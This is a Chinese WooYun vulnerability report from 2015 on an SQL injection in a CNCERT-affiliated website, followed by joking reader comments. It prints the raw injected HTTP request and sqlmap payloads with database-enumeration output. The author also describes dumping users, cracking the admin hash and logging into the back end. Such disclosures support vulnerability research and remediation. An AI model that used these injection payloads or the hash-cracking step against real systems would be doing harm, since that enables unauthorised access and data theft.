缺陷编号:WooYun-2015-0125476
漏洞标题:国家互联网应急中心某处SQL注入(可进后台)
相关厂商:国家互联网应急中心
漏洞作者:天地不仁 以万物为刍狗
提交时间:2015-07-10 20:58
公开时间:2015-08-24 12:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开
为何里面没有我大乌云!!!! 不开心 难道给我大乌云 免费赞助的位置都木有?
数据:
1 2 3 4 5 6 7 8 9 10 |
GET /ajax/ajax.php?action=three&callback=jQuery18206096214759163558_1436357993409&cid=10%20AND%203*2*1%3d6%20AND%20519%3d519 HTTP/1.1<br> X-Forwarded-For: **.**.**.**'<br> X-Requested-With: XMLHttpRequest<br> Referer: http://**.**.**.**/<br> Host: **.**.**.**<br> Content-Length: 0<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br> Accept: */* |
参数 cid 可注入(详情见下图以及漏洞证明)
跑了下 2015_cert_org_cn 这个数据库
用户才3个 就dump 看了下有哪些用户
解密了下 admin 的md5 登陆了后台(以下为后台截图 为何没有我大乌云)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br> y)? [y/N] n<br> sqlmap identified the following injection points with a total of 333 HTTP(s) req<br> uests:<br> ---<br> Parameter: #1* (URI)<br> Type: boolean-based blind<br> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY<br> clause<br> Payload: http://**.**.**.**:80/ajax/ajax.php?action=three&callback=jQue<br> ry18206096214759163558_1436357993409&cid=10 AND 3 RLIKE (SELECT (CASE WHEN (2420<br> =2420) THEN 0x3130253230414e4425323033 ELSE 0x28 END))-- koEt21=6 AND 519=519Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl<br> ause<br> Payload: http://**.**.**.**:80/ajax/ajax.php?action=three&callback=jQue<br> ry18206096214759163558_1436357993409&cid=10 AND 3 AND (SELECT 9977 FROM(SELECT C<br> OUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9977=9977,1))),0x7170786271,FLOOR(RAND(<br> 0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ZEJH21=6 AND 519=<br> 519Type: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: http://**.**.**.**:80/ajax/ajax.php?action=three&callback=jQue<br> ry18206096214759163558_1436357993409&cid=10 AND 3 AND (SELECT * FROM (SELECT(SLE<br> EP(5)))Exdj)-- hlab21=6 AND 519=519Type: UNION query<br> Title: Generic UNION query (NULL) - 3 columns<br> Payload: http://**.**.**.**:80/ajax/ajax.php?action=three&callback=jQue<br> ry18206096214759163558_1436357993409&cid=10 AND 3 UNION ALL SELECT CONCAT(0x7171<br> 7a7171,0x714f704f5a464366626c,0x7170786271),NULL,NULL-- 21=6 AND 519=519<br> ---<br> [20:29:55] [INFO] the back-end DBMS is MySQL<br> web server operating system: Linux CentOS 6.5<br> web application technology: PHP 5.3.3, Apache 2.2.15<br> back-end DBMS: MySQL 5.0<br> [20:29:55] [INFO] fetching database names<br> [20:29:55] [WARNING] something went wrong with full UNION technique (could be be<br> cause of limitation on retrieved number of entries). Falling back to partial UNI<br> ON technique<br> [20:29:55] [WARNING] the SQL query provided does not return any output<br> [20:29:55] [INFO] the SQL query used returns 5 entries<br> [20:29:55] [INFO] retrieved: information_schema<br> [20:29:55] [INFO] retrieved: 2015_cert_org_cn<br> [20:29:55] [INFO] retrieved: mysql<br> [20:29:56] [INFO] retrieved: performance_schema<br> [20:29:56] [INFO] retrieved: test<br> available databases [5]:<br> [*] 2015_cert_org_cn<br> [*] information_schema<br> [*] mysql<br> [*] performance_schema<br> [*] test[20:29:56] [INFO] fetched data logged to text files under 'C:\Users\Administrato<br> r\.sqlmap\output\**.**.**.**' |
危害等级:中
漏洞Rank:10
确认时间:2015-07-1011:59
CNVD确认并复现所述情况,已经转由CNCERT协调相关部门处置。
暂无
坐等公开,顺便前排混个脸熟
火速前排围观
这。。。。。。。。。。。。
菊花
不是可进后台。是已进后台。
平时都是你审核别人的。 这回傻了吧
顿时菊花一紧…
肥皂掉在了地上...
啥也不说了,楼主一看就是玩德邦的,花已碎满地!!!
原文连接
的情况下转载,若非则不得使用我方内容。